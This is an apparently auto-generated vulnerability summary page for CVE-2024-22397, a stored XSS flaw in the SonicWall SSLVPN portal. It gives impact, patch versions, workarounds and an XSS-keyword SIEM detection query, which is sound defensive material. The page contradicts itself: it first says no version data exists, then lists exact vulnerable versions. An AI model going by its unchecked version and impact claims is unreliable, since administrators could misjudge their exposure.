CVE-2024-22397
📋 TL;DR
This stored cross-site scripting (XSS) vulnerability in SonicOS SSLVPN portal allows authenticated admin users to inject and execute arbitrary JavaScript code. Attackers with admin credentials can compromise other users' sessions, steal credentials, or perform actions on their behalf. Only SonicWall firewalls with SSLVPN enabled and using affected SonicOS versions are impacted.
💻 Affected Systems
- SonicWall firewalls with SSLVPN portal
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Admin-level attacker could steal all user credentials, hijack administrator sessions, deploy ransomware across the network, or pivot to internal systems.
Likely Case
Attackers with stolen admin credentials would inject malicious scripts to steal user session cookies and credentials, enabling lateral movement and data exfiltration.
If Mitigated
With proper access controls and monitoring, impact limited to isolated credential theft that can be detected and contained.
🎯 Exploit Status
Exploitation requires admin credentials but the XSS injection itself is straightforward once authenticated
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: SonicOS 7.1.1-7041 and later, SonicOS 7.0.1-5111 and later
Vendor Advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0005
Restart Required: Yes
Instructions:
1. Log into SonicWall firewall management interface. 2. Navigate to System > Settings > Firmware & Backups. 3. Download and install the patched firmware version. 4. Reboot the firewall after installation completes.
🔧 Temporary Workarounds
Disable SSLVPN portal
allTemporarily disable the SSLVPN portal if not required for business operations
Navigate to VPN > SSL-VPN > Server Settings and uncheck 'Enable SSL-VPN'
Restrict admin access
allImplement strict access controls and multi-factor authentication for admin accounts
Navigate to System > Administration > Administrators and enable MFA for all admin accounts
🧯 If You Can't Patch
- Implement strict input validation and output encoding for SSLVPN portal inputs
- Deploy web application firewall (WAF) rules to block XSS payloads targeting the SSLVPN portal
🔍 How to Verify
Check if Vulnerable:
Check SonicOS version in System > Status > System Information. If version is 7.1.1-7040 or earlier, or 7.0.1-5110 or earlier, system is vulnerable.Check Version:
show version (from CLI) or check System > Status > System Information (from GUI)Verify Fix Applied:
Verify SonicOS version is 7.1.1-7041 or later, or 7.0.1-5111 or later. Test SSLVPN portal for XSS by attempting to inject basic script payloads.📡 Detection & Monitoring
Log Indicators:
- Unusual admin login patterns
- Multiple failed login attempts followed by successful admin login
- Suspicious JavaScript payloads in SSLVPN portal logs
Network Indicators:
- Unusual outbound connections from firewall after admin login
- Traffic patterns suggesting credential harvesting
SIEM Query:
source="sonicwall" AND (event_type="admin_login" OR event_type="ssl_vpn") AND (message="*script*" OR message="*javascript*" OR message="*onerror*" OR message="*onload*")